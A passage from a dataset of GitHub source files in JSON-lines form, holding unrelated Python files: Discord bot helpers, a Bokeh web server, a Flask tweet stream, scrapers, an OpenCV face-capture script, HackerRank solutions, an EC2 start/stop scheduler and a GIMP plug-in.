else:\r\n with open(f'logs/{time}.log.csv', 'w') as log:\r\n writer = csv.writer(log)\r\n writer.writerow(headers)\r\n writer.writerow(\r\n [datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S'), author, authorid, server, serverid, content])\r\n\r\n\r\nasync def getMsgFromUser(ctx, bot, timeout=30):\r\n def check(msg):\r\n return msg.channel == ctx.channel and msg.author == ctx.message.author\r\n msg = None\r\n try:\r\n msg = await bot.wait_for(\"message\", check=check,\r\n timeout=timeout) # x seconds to reply\r\n except asyncio.TimeoutError:\r\n pass\r\n return msg\r\n\r\n\r\nasync def getMulitpleMsgs(ctx, bot, timeout=30, endLoop='end'):\r\n msg = \"random msg\"\r\n allMsg = []\r\n while msg and msg != endLoop:\r\n msg = getMsgFromUser(ctx, bot, timeout=timeout)\r\n if msg and msg.lower() != endLoop:\r\n allMsg.append(msg)\r\n\r\n\r\ndef cancelChecker(toCkeck, cancelstr='cancel'):\r\n if not toCkeck or (toCkeck and toCkeck.lower() == cancelstr):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nasync def getAtatchment(ctx, bot, timeout=40):\r\n def check(msg):\r\n return msg.channel == ctx.channel and msg.author == ctx.message.author and len(msg.attachments) > 0\r\n file = None\r\n msg = None\r\n try:\r\n msg = await bot.wait_for(\"message\", check=check,\r\n timeout=timeout) # x seconds to reply\r\n file = msg.attachments[0].url\r\n except asyncio.TimeoutError:\r\n pass\r\n return file, msg\r\n\r\n\r\ndef writeToFile(path, content):\r\n with open(path, 'w') as file:\r\n file.write(str(content))\r\n\r\n\r\ndef parseTime(timeToParse: datetime):\r\n return timeToParse.strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n\r\ndef getDatetimeFromParsedString(date: str):\r\n return datetime.strptime(date, '%Y-%m-%d %H:%M:%S')\r\n\r\n\r\ndef beautifyDate(datetimeToParse: datetime):\r\n return datetimeToParse.strftime('%H:%M - %a %d-%b-%Y')\r\n\r\n\r\ndef getPrettyStringFromDict(toBeautify: dict):\r\n beautifulStuff = ''\r\n for key, val in toBeautify.items():\r\n beautifulStuff += f'{key} => {val}\\n'\r\n return beautifulStuff\r\n\r\n\r\ndef getBotActivity(activityType: str, msg, url=None):\r\n \"\"\"\r\n Returns the bot activity and its content based on the input parameters\r\n\r\n Parameters\r\n ---------------\r\n activityType : str\r\n msg : str\r\n url : str\r\n \"\"\"\r\n if activityType.lower() == \"playing\":\r\n activity = discord.Game(name=msg)\r\n elif activityType.lower() == \"streaming\":\r\n activity = discord.Streaming(\r\n name=msg, url=url)\r\n elif activityType.lower() == \"listening\":\r\n activity = discord.Activity(\r\n type=discord.ActivityType.listening, name=msg)\r\n elif activityType.lower() == \"watching\":\r\n activity = discord.Activity(\r\n type=discord.ActivityType.watching, name=msg)\r\n else:\r\n activity = None\r\n\r\n return activity\r\n\r\n\r\ndef parse_possesive(name):\r\n \"\"\"\r\n Returns the name + the posseive 's or '\r\n Parameters\r\n -----------\r\n name : srt\r\n \"\"\"\r\n if name[-1].lower() == \"s\":\r\n return name + \"\\'\"\r\n else:\r\n return name + \"\\'s\"\r\n\r\n\r\ndef getBotStatus(status):\r\n \"\"\"\r\n Returns the discord bot status\r\n\r\n Parameters\r\n ---------------\r\n status : str\r\n \"\"\"\r\n if status.lower() == \"dnd\":\r\n return discord.Status.dnd\r\n elif status.lower() == \"invisible\":\r\n return discord.Status.invisible\r\n elif status.lower() == \"idle\":\r\n return discord.Status.idle\r\n else:\r\n return discord.Status.online\r\n\r\n\r\ndef getDiscordColor(color: str):\r\n colors = {\r\n 'light grey': discord.Color.light_grey(),\r\n 'red': discord.Color.red(),\r\n 'blue': discord.Color.blue(),\r\n 'green': discord.Color.green(),\r\n 'orange': discord.Color.orange(),\r\n 'yellow': discord.Color.yellow(),\r\n 'purple': discord.Color.purple()\r\n }\r\n return colors.get(color.lower())\r\n\r\n\r\ndef camel_case(s: str):\r\n s = re.sub(r\"(_|-)+\", \" \", s).title().replace(\" \", \"\")\r\n return ''.join([s[0].lower(), s[1:]])\r\n\r\n\r\ndef ordinal(n): return f'{n}{\"tsnrhtdd\"[(n//10%10!=1)*(n%10<4)*n%10::4]}'\r\n\r\n\r\ndef chunks(lst, n):\r\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\r\n for i in range(0, len(lst), n):\r\n yield lst[i:i + n]\r\n\r\n\r\ndef hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\r\n h_min = min(im.shape[0] for im in im_list)\r\n im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)\r\n for im in im_list]\r\n return cv2.hconcat(im_list_resize)\r\n\r\n\r\ndef vconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\r\n w_min = min(im.shape[1] for im in im_list)\r\n im_list_resize = [cv2.resize(im, (w_min, int(im.shape[0] * w_min / im.shape[1])), interpolation=interpolation)\r\n for im in im_list]\r\n return cv2.vconcat(im_list_resize)\r\n\r\n\r\ndef convert_string_to_bytes(string):\r\n bytes = b''\r\n for i in string:\r\n bytes += struct.pack(\"B\", ord(i))\r\n return bytes\r\n\r\n\r\ndef binary_str_to_nparray(binstr):\r\n imgData = io.BytesIO(binstr)\r\n img = Image.open(imgData).convert('RGB')\r\n img = np.asarray(img)\r\n return img\r\n\r\n\r\ndef downloadImgFromUrl(url):\r\n r = requests.get(url)\r\n if r.status_code == 200:\r\n r.raw.decode_content = True\r\n return r.content\r\n","repo_name":"ThePoisoned1/DaWagonBot","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12280168174","text":"import functools\nimport logging\nimport os\nimport re\n\nfrom bokeh.application import Application\nfrom bokeh.application.handlers import FunctionHandler\nfrom bokeh.embed import server_document\nfrom bokeh.server.server import Server\nfrom tornado import web\n\nfrom ... import oscar as mo\nfrom ...utils import get_next_port\n\nlogger = logging.getLogger(__name__)\n_ROOT_PLACEHOLDER = 'ROOT_PLACEHOLDER'\n\n\nclass BokehStaticFileHandler(web.StaticFileHandler): # pragma: no cover\n @staticmethod\n def _get_path_root(root, path):\n from bokeh import server\n path_parts = path.rsplit('/', 1)\n if 'bokeh' in path_parts[-1]:\n root = os.path.join(os.path.dirname(server.__file__), \"static\")\n return root\n\n @classmethod\n def get_absolute_path(cls, root, path):\n return super().get_absolute_path(cls._get_path_root(root, path), path)\n\n def validate_absolute_path(self, root, absolute_path):\n return super().validate_absolute_path(\n self._get_path_root(root, absolute_path), absolute_path)\n\n\nclass MarsRequestHandler(web.RequestHandler): # pragma: no cover\n def initialize(self, supervisor_addr):\n self._supervisor_addr = supervisor_addr\n\n def get_root_path(self):\n req_path = re.sub('/+', '/', self.request.path).lstrip('/')\n slash_count = sum(1 for c in req_path if c == '/')\n if slash_count > 0:\n return '../' * slash_count\n else:\n return './'\n\n def write_rendered(self, template, **kwargs):\n self.write(template.render(\n request=self.request, root_path=self.get_root_path(), **kwargs))\n\n def bokeh_server_document(self, url, resources=\"default\", arguments=None):\n raw_script = server_document(\n f'{_ROOT_PLACEHOLDER}/{url}', relative_urls=True, resources=resources, arguments=arguments)\n\n # FIXME lines below hacks codes generated by bokeh to support\n # websocket connection in proxy-passed environments\n quote = raw_script[raw_script.index(_ROOT_PLACEHOLDER) - 1]\n path_replacer = (\n f'&bokeh-app-path=\" + window.location.pathname.match(/.*\\\\//) + \"{self.get_root_path()}'\n )\n path_replacer = path_replacer.replace('\"', quote)\n\n script = raw_script.replace(f'&bokeh-app-path=/{_ROOT_PLACEHOLDER}/', path_replacer) \\\n .replace(f'{_ROOT_PLACEHOLDER}/', self.get_root_path())\n return script\n\n\nclass WebActor(mo.Actor):\n def __init__(self, config):\n super().__init__()\n self._config = config\n self._web_server = None\n\n async def start(self):\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n supervisor_addr = self.address\n\n host = self._config.get('host') or '0.0.0.0'\n port = self._config.get('port')\n bokeh_apps = self._config.get('bokeh_apps', {})\n web_handlers = self._config.get('web_handlers', {})\n\n handlers = dict()\n for p, h in bokeh_apps.items():\n handlers[p] = Application(FunctionHandler(\n functools.partial(h, supervisor_addr=supervisor_addr)))\n\n handler_kwargs = {'supervisor_addr': supervisor_addr}\n extra_patterns = [\n (r'[^\\?\\&]*/static/(.*)', BokehStaticFileHandler, {'path': static_path})\n ]\n for p, h in web_handlers.items():\n extra_patterns.append((p, h, handler_kwargs))\n\n retrial = 5\n while retrial:\n try:\n if port is None:\n port = get_next_port()\n\n self._web_server = Server(\n handlers, allow_websocket_origin=['*'],\n address=host, port=port,\n extra_patterns=extra_patterns,\n http_server_kwargs={'max_buffer_size': 2 ** 32},\n )\n self._web_server.start()\n logger.info('Mars UI started at %s:%d', host, port)\n break\n except OSError: # pragma: no cover\n if port is not None:\n raise\n retrial -= 1\n if retrial == 0:\n raise\n\n\nasync def start(config: dict, address: str = None):\n ref = await mo.create_actor(WebActor, config=config.get('web', {}),\n address=address)\n await ref.start()\n","repo_name":"chi2liu/mars","sub_path":"mars/services/web/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"36128069873","text":"import json\nimport time\nfrom random import random\nfrom redis import StrictRedis\nfrom bson import json_util\nfrom flask import Flask, Response, jsonify\nfrom flask.ext.cors import CORS, cross_origin\nfrom pymongo import MongoClient, CursorType\nfrom threading import Thread\n\ndef connect():\n con = MongoClient()\n return con[\"pacmay\"]\n\napp = Flask(__name__)\ncors = CORS(app)\nhandle = connect()\nredis = StrictRedis()\n\ndef rand_loc():\n lat = random() * 180 - 90\n lng = random() * 360 - 180\n return [lat, lng]\n\ndef get_cursor(collection, condition, await_data=True):\n cursor_type = CursorType.TAILABLE\n if await_data:\n cursor_type = CursorType.TAILABLE_AWAIT\n cur = collection.find(condition, cursor_type=cursor_type)\n return cur\n\ndef get_tweets():\n cursor = get_cursor(handle.tweets, {\"coordinates.type\": \"Point\"})\n i = 0\n while cursor.alive:\n i += 1\n try:\n doc = cursor.next()\n if doc and \"coordinates\" in doc and doc[\"coordinates\"]:\n coordinates = doc[\"coordinates\"][\"coordinates\"]\n else:\n coordinates = rand_loc()\n\n if \"text\" in doc:\n text = doc[\"text\"]\n\n if \"user\" in doc and \"profile_image_url\" in doc[\"user\"]:\n profile_image = doc[\"user\"][\"profile_image_url\"]\n\n redis.publish(\"chat\", '{\"coordinates\": %s, \"data\": %s, \"index\": %i, \"profile_image\": %s}' \n % (coordinates, json.dumps(text), i, json.dumps(profile_image)))\n except StopIteration:\n time.sleep(1)\n\ndef run_thread():\n th = Thread(target=get_tweets)\n th.start()\n\ndef event_stream():\n pubsub = redis.pubsub()\n pubsub.subscribe(\"chat\")\n for message in pubsub.listen():\n yield \"data: %s\\n\\n\" % message[\"data\"]\n\n@app.route(\"/new_tweets\")\n@cross_origin()\ndef new_tweets():\n return Response(event_stream(), mimetype=\"text/event-stream\")\n\n@app.route(\"/tweets\")\n@cross_origin()\ndef tweets():\n cursor = handle.tweets.find({\"coordinates.type\": \"Point\"})\n tweets = [{\"coordinates\": doc[\"coordinates\"][\"coordinates\"]} for doc in cursor]\n return json.dumps(tweets)\n\nif __name__ == \"__main__\":\n app.before_first_request(run_thread)\n app.run(debug=True)\n","repo_name":"codenut/pacmay_heatmap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12589889390","text":"\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\legion\\\\Desktop\\\\chromedriver.exe\")\n\ndriver.get(\"http://localhost:3000/contact/contact\")\ntime.sleep(3)\ndriver.maximize_window()\ntime.sleep(3)\ndriver.find_element_by_id(\"htc\").click()","repo_name":"sk9073/WalkoverWork","sub_path":"pages/contact/Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25557975932","text":"import cv2, os\n\nhaar_file = \"haarcascade_frontalface_default.xml\"\ndataset = \"dataset\"\nsub_data = \"sahil\"\n\npath = os.path.join(dataset,sub_data)\nif not os.path.isdir(path):\n os.mkdir(path)\n\n(width, height) = (130,100)\n\nface_casscade = cv2.CascadeClassifier(haar_file)\ncam = cv2.VideoCapture(0)\n\ncount = 1\nwhile count <31:\n print(count)\n (_, img)= cam.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n face = face_casscade.detectMultiScale(gray)\n for (x,y,w,h) in face:\n cv2.rectangle(img,(x,y),(x+w, y+h),(255,0,0),2)\n face= gray[y:y+h, x:x+h]\n face_resize = cv2.resize(face, (width, height))\n cv2.imwrite(f'{path}/{count}.png',face_resize)\n count += 1\n\n cv2.imshow(\"Saving in DataBase\", img)\n key = cv2.waitKey(100)\n if key == 27:\n break\ncam.release()\ncv2.destroyAllWindows()","repo_name":"Hrithik5532/OpenCV_Projects","sub_path":"Face Recognition/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19475920900","text":"# solution 1\ndef get_median(counts, mids):\n res = []\n for mid in mids:\n gone = 0\n for i, v in enumerate(counts):\n gone += v\n if gone >= mid:\n res.append(i)\n break\n return sum(res) / len(res)\n\n\n# Complete the activityNotifications function below.\ndef activityNotifications(expenditure, d):\n alerts = 0\n counts = [0] * 201\n\n if d % 2 == 1:\n mids = [d // 2 + 1]\n else:\n mids = [d // 2, d // 2 + 1]\n\n for v in expenditure[:d]:\n counts[v] += 1\n\n for i, exp in enumerate(expenditure[d:]):\n median = get_median(counts, mids)\n\n if exp >= 2 * median:\n alerts += 1\n\n old_value = expenditure[i]\n counts[old_value] -= 1\n counts[exp] += 1\n\n return alerts\n\n# solution 2\ndef activityNotifications(expenditure, d):\n k = 200\n counter = 0\n\n count = (k + 1) * [0] # indices runs from 0 to max(array) inclusive\n\n for i in expenditure[:d]:\n count[i] += 1 # Initial frequency array, jth value of count is the frequency of number j\n\n if (d % 2) == 1: # Odd frequency case\n for i in range(d, len(expenditure)):\n cumfreq = (k + 1) * [0]\n cumfreq[0] = count[0]\n\n for j in range(1, k + 1):\n cumfreq[j] += cumfreq[j - 1] + count[j]\n\n if cumfreq[j] > (d) / 2:\n median = j # first j s.t. count[j-1] < (d+1)/2 and count[j] >= (d+1)/2\n break\n else:\n continue\n\n if expenditure[i] >= 2 * median:\n counter += 1\n\n count[expenditure[i - d]] -= 1\n count[expenditure[i]] += 1\n\n if (d % 2) == 0: # Even frequency case\n for i in range(d, len(expenditure)):\n cumfreq = (k + 1) * [0]\n cumfreq[0] = count[0]\n\n m1 = None\n m2 = None\n\n for j in range(1, k + 1):\n cumfreq[j] += cumfreq[j - 1] + count[j]\n\n if (cumfreq[j] >= (d) / 2) and (m1 is None):\n m1 = j\n\n if cumfreq[j] >= (d + 1) / 2:\n m2 = j\n median = (m1 + m2) / 2\n break\n else:\n continue\n\n if expenditure[i] >= 2 * median:\n counter += 1\n\n count[expenditure[i - d]] -= 1\n count[expenditure[i]] += 1\n\n return counter\n\n\n\n\n\n\n######################################################################\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nn, d = map(int, input().split())\na = map(int, input().split())\nnoti = 0\n\n# histogram for expenditure of the 1st d days\nw = [0 ] *(201)\nfor i in range(d):\n w[a[i]] += 1\n\n# calculate the median: index is the count of days till we get to the position of the median value\n# in case of even sample size (d days), we need two values to calculate the median. To make it simpler, I separated the odd and the even case\nfor i in range( n -d):\n index, li, lo = 0, 0, 0\n if d% 2 != 0:\n for j in range(201):\n index += w[j]\n if index >= d / 2 + 1:\n med = float(j)\n break\n else:\n for j in range(201):\n index += w[j]\n if index >= (d / 2) and li == 0:\n li = j\n if index >= (d / 2 + 1) and lo == 0:\n lo = j\n if li != 0 and lo != 0:\n med = (float(li) + float(lo)) / 2\n break\n if float(a[d + i]) >= med * 2:\n noti += 1\n\n # move the window of d days forward by 1 day\n w[a[i]] -= 1\n w[a[d + i]] += 1\n\n# we're done\nprint(noti)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"NikolayVaklinov10/Interview_Preparation_Kit","sub_path":"Sorting/Fraudulent_Activity_Notifications.py","file_name":"Fraudulent_Activity_Notifications.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18556712931","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nlink = \"https://daiyafoods.com/food-service/\"\r\nheaders={'User-Agent': 'Mozilla/5.0'}\r\nresult = requests.get(link, headers=headers)\r\nsoup = BeautifulSoup(result.content.decode(), 'html.parser')\r\nproduct=''\r\narticle = soup.find(\"div\", {\"class\": \"-df-homeProductsCarouselScroll carouselScroll df2020-slides fs-slides\"}).findAll('p')\r\nfor val in article:\r\n product += ''.join(val.findAll(text=True))\r\nprint(\"Available Product Name are\"+product)\r\n\r\n","repo_name":"salonypermanand/CSTEST","sub_path":"CsAssign.py","file_name":"CsAssign.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30339429286","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nclass Stack():\n def __init__(self):\n self.stack = []\n def push(self, x):\n self.stack.insert(0, x)\n def pop(self):\n return self.stack.pop(0)\n def len(self):\n return len(self.stack)\n\n# Complete the isBalanced function below.\n\n# Comments are examples of strings that a case would account for\ndef isBalanced(s):\n stack = Stack()\n for char in s:\n if char == '{' or char == '[' or char == '(':\n stack.push(char)\n if char == ')':\n # )()...\n # [)...\n if stack.len() == 0 or stack.pop() != '(':\n return \"NO\"\n if char == ']':\n # ][ ...\n # {]...\n if stack.len() == 0 or stack.pop() != '[':\n return \"NO\"\n if char == '}':\n # }}...\n # (}...\n if stack.len() == 0 or stack.pop() != '{':\n return \"NO\"\n\n # This handles strings like (((\n if stack.len() > 0:\n return \"NO\"\n else:\n return \"YES\"\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(raw_input())\n\n for t_itr in xrange(t):\n s = raw_input()\n\n result = isBalanced(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"dm36/interview-practice","sub_path":"hacker_rank/balanced_brackets.py","file_name":"balanced_brackets.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"35675921352","text":"# Atualizar o pip\r\n#\tpython -m pip install --upgrade pip\r\n#\r\n# Instalar o BeautifulSoup\r\n#\tpip install beautifulsoup4\r\n#\r\n# Instalar o requests\r\n#\tpip install requests\r\n#\r\n# Página fonte\r\n#\thttp://loteriasbr.com/site/home/?search=2018-11-02\r\n#\r\n# Danton Cavalcanti Franco Junior - falecom@dantonjr.com.br\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import datetime, timedelta\r\nimport requests\r\nimport csv\r\nimport re\r\n\r\narquivo = open('resultados.csv', 'w', newline = '')\r\ngravaCSV = csv.writer(arquivo, delimiter = ';', doublequote = False, skipinitialspace = True)\r\ngravaCSV.writerow(['Data', 'Jogo', '1 prêmio', '2 prêmio', '3 prêmio', '4 prêmio', '5 prêmio'])\r\ndataInicial = datetime(2018, 11, 1)\r\n\r\nfor dias in range(int((datetime.now() - dataInicial).days)):\r\n dataFim = dataInicial + timedelta(dias)\r\n url = \"https://loteriasbr.com/site/home/?search=%s\" % dataFim.strftime('%Y-%m-%d')\r\n pagina = requests.get(url)\r\n\r\n soup = BeautifulSoup(pagina.content, 'html.parser')\r\n print(url, \"Status:\", pagina.status_code)\r\n\r\n divJogos = soup.findAll('div', class_='panel quadro-jogo')\r\n\r\n for jogo in divJogos:\r\n nomeCheio = jogo.findAll('div')\r\n nomeJogo = nomeCheio[0].get_text()\r\n nomeJogo = nomeJogo[1:nomeJogo.find(' ')]\r\n if not re.search(\".*(PT|FD|COR).*\", nomeJogo):\r\n continue\r\n\r\n resultados = jogo.findAll('span', class_='pull-right')\r\n gravaCSV.writerow([dataFim.strftime('%d/%m/%Y'), nomeJogo, resultados[0].get_text().replace('.', ''), resultados[1].get_text().replace('.', ''), resultados[2].get_text().replace('.', ''), resultados[3].get_text().replace('.', ''), resultados[4].get_text().replace('.', '')])\r\n\r\narquivo.close()\r\nprint(\"fim\")\r\n","repo_name":"dantonjr/python","sub_path":"webScraping/jogoDoBicho.py","file_name":"jogoDoBicho.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29512353944","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Requires: your boto config file (~/.boto) to contain your aws credentials\n#\n# [Credentials]\n# aws_access_key_id = \n# aws_secret_access_key = \n\n__author__ = 'monkee'\n__project__ = 'TheSleeper'\n\nimport boto.ec2, boto.sns, boto.utils\nimport yaml, sys,logging,time,os\nfrom croniter import croniter\n\n\nclass thesleeper:\n conn = \"\"\n config = \"\"\n timestamp = time.strftime(\"%d/%m/%Y %H:%M:%S\")\n sns_stop = list()\n sns_start = list()\n profile_name = None\n profile_list = []\n sleeper_instance_id = None\n\n def __init__(self):\n self.load_credentials()\n self.load_defaults()\n self.set_timezone()\n self.sns_connect()\n self.get_sleeper_instance_id()\n #begin multiple connection loop\n for profile in self.profile_list:\n self.profile_name = profile\n self.ec2_connect()\n if self.config['general']['shutdown_untagged'] is True:\n self.search_for_untagged_to_stop()\n self.search_for_tagged()\n self.sns_message()\n #end multiple connection loop\n\n def load_credentials(self):\n for section,details in boto.config._sections.iteritems():\n if section == \"Credentials\":\n self.profile_list.append('None')\n continue\n if 'profile ' in section:\n self.profile_list.append(section[8:])\n continue\n\n def load_defaults(self):\n try:\n config_str = open(os.path.dirname(__file__) + '/config.yml', 'r')\n self.config = yaml.load(config_str)\n logfile = os.path.dirname(__file__) + \"/\" + self.config['general']['logfile']\n logging.basicConfig(filename=logfile, level=logging.INFO)\n except IOError as error:\n exit(\"Could not load config.yml: \" + str(error))\n except:\n raise\n exit(\"Unexpected error:\" + str(sys.exc_info()[0]))\n\n def get_sleeper_instance_id(self):\n self.sleeper_instance_id = boto.utils.get_instance_metadata()['instance-id']\n\n def set_timezone(self):\n try:\n os.environ[\"TZ\"]=self.config['general']['time_zone']\n time.tzset()\n self.time = time.time()\n except Exception as error:\n exit(\"Could not set time related stuff- very bad\")\n\n def ec2_connect(self):\n try:\n self.conn = boto.ec2.connect_to_region(self.config['general']['region'],profile_name=self.profile_name)\n except:\n #done again\n exit(\"Failed to connect to EC2\")\n\n def sns_connect(self):\n try:\n self.snsconn = boto.sns.connect_to_region(self.config['general']['region'],profile_name=self.profile_name)\n except (BaseException) as emsg:\n #done again\n logging.warning(self.timestamp + ': No SNS configured correctly - carry on - ' + str(emsg))\n #no sns configured or some issue\n pass\n\n def search_for_tagged(self):\n try:\n reservations = self.conn.get_all_instances(filters={'tag-key' : self.config['general']['filter']})\n for reserve in reservations:\n self.search_sleeper_tags(reserve.instances[0])\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cannot search for instances ' + str(emsg))\n sys.exit(\"Cannot search for instances/reservations\")\n\n def search_for_untagged_to_stop(self):\n try:\n reservations = self.conn.get_all_instances()\n for reserve in reservations:\n if self.config['general']['filter'] not in reserve.instances[0].__dict__['tags']:\n self.stop_instance(reserve.instances[0])\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Untagged stop exception - not critical' + str(emsg))\n pass\n\n def search_sleeper_tags(self,instance):\n value = instance.__dict__['tags'][self.config['general']['filter']]\n if value == \"\":\n #we always trash instances that are not tagged correctly\n self.stop_instance(instance)\n return\n elif value == 'pass':\n #we take no specific action with this - by design\n return\n self.parse_cron(instance,value)\n\n def parse_cron(self,instance,value):\n try:\n crons = value.split('|')\n for i,v in enumerate(crons):\n if i == 0:\n self.cron_stop(instance,v)\n elif i == 1:\n self.cron_start(instance,v)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Could not parse tags - carry on ' + str(emsg))\n pass\n\n def cron_stop(self,instance,value):\n try:\n misspast = self.return_misspast(value)\n if misspast is False:\n return\n if (misspast < 0) and (misspast > -self.config['general']['threshold']):\n self.stop_instance(instance)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cron Stop Failed on a value ' + str(emsg))\n pass\n\n def cron_start(self,instance,value):\n try:\n misspast = self.return_misspast(value)\n if misspast is False:\n return\n if (misspast < 0) and (misspast > -self.config['general']['threshold']):\n self.start_instance(instance)\n except (BaseException) as emsg:\n logging.warning(self.timestamp + ': Cron start failed on a value ' + str(emsg))\n pass\n\n def return_misspast(self,value):\n try:\n iter = croniter(value,self.time)\n point = iter.get_next(float)\n newpoint = iter.get_prev(float)\n misspast = newpoint - self.time\n return misspast\n except:\n return False\n\n def stop_instance(self, instance):\n if instance.id == self.sleeper_instance_id:\n # dont ever ever ever ever ever ever ever shut yourself down ever\n logging.warning(self.timestamp + ' Hmmm just tried to shut myself down - this is not cool')\n return\n if instance.state == \"running\":\n self.sns_stop.append(instance.id)\n instance.stop()\n\n def start_instance(self, instance):\n if instance.state == \"stopped\":\n self.sns_start.append(instance.id)\n instance.start()\n\n def sns_message(self):\n message = \"\"\n\n for item in self.sns_start:\n message += \"Started Instance:\" + item + \"\\n\"\n for item in self.sns_stop:\n message += \"Stopped Instance:\" + item + \"\\n\"\n\n if message != \"\":\n try:\n self.snsconn.publish(self.config['general']['sns_topic'], message, \"TheSleeper was invoked\")\n except:\n pass\n\n\nif __name__ == \"__main__\":\n ts = thesleeper()\n\n\n","repo_name":"monk-ee/TheSleeper","sub_path":"thesleeper.py","file_name":"thesleeper.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8306946754","text":"#!/usr/bin/env python\n# GIMP Python plug-in for a \"quick\" image enhancement:\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License Version 3 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License at http://www.gnu.org/licenses for\n# more details.\n\n# Cheap HDR + Unsharp maks + Contrast stretch\n# Quick AND idiosyncratic -- this is just my personal taste\n\nfrom gimpfu import *\nimport process\n\ndef quick_enhance(img,layer,r_hdr,s_hdr,f_hdr,r_sharp,s_l_mode,f_stretch):\n '''combines cheap-hdr, sharpen, and stretch'''\n with process.UndoContext(img):\n process.cheap_hdr(img,layer,r_hdr,s_hdr,f_hdr)\n process.sharpen(img,layer,r_sharp,s_l_mode)\n if f_stretch:\n process.stretch(img,layer,f_stretch)\n else:\n process.visible_base(img,name=\"QuickEnhanced\")\n\n\nprocess.pfreg(quick_enhance,\n [\n (PF_IMAGE, \"image\", \"Input image\", None),\n (PF_DRAWABLE, \"drawable\", \"Input drawable\", None),\n (PF_SLIDER, \"r_hdr\", \"HDR Radius\", 750, (0, 1500, 1)),\n (PF_SLIDER, \"s_hdr\", \"HDR Spread\", 50, (0, 250, 10)),\n (PF_SLIDER, \"f_hdr\", \"HDR factor\", 50, (0, 100, 1)),\n (PF_SLIDER, \"r_sharp\", \"Unsharp Radius\", 9, (0, 25, 1)),\n (PF_RADIO, \"s_l_mode\",\"Sharpen Layer Mode\",\n LAYER_MODE_DARKEN_ONLY,\n ((\"darken\", LAYER_MODE_DARKEN_ONLY),\n (\"lighten\", LAYER_MODE_LIGHTEN_ONLY),\n (\"normal\", LAYER_MODE_NORMAL))),\n (PF_SLIDER, \"f_stretch\",\"Stretch factor\",50, (0,100,1)),\n ],\n name=\"Quick Enhance\",\n description=\"Cheap HDR, then sharpen, then stretch\",\n author=\"theilr\",\n year=2022,\n menu=\"/Filters/theilr\"\n)\n\nmain()\n","repo_name":"theilr/gimp-frastructure","sub_path":"quickenhance.py","file_name":"quickenhance.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16560598388","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\"\"\"\n @author:huang xiaoqin\n @time: 2020/8/4\n @desc:\n\"\"\"\n\nclass Solution(object):\n def backspaceCompare(self, S, T):\n \"\"\"\n :type S: str\n :type T: str\n :rtype: bool\n \"\"\"\n S_stack = []\n T_stack = []\n for ch in S:\n if ch == '#':\n if len(S_stack)>0:\n S_stack.pop()\n else:\n S_stack.append(ch)\n for ch in T:\n if ch == '#' :\n if len(T_stack)>0:\n T_stack.pop()\n else:\n T_stack.append(ch)\n print(S_stack,T_stack)\n while len(S_stack) != 0 and len(T_stack) != 0:\n if S_stack.pop() != T_stack.pop():\n return False\n if len(S_stack)>0 or len(T_stack)>0:\n return False\n return True\n","repo_name":"294150302hxq/python_learn","sub_path":"leetcode/844_backspace_string_compare.py","file_name":"844_backspace_string_compare.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2553192771","text":"import pygame\nimport json\nimport 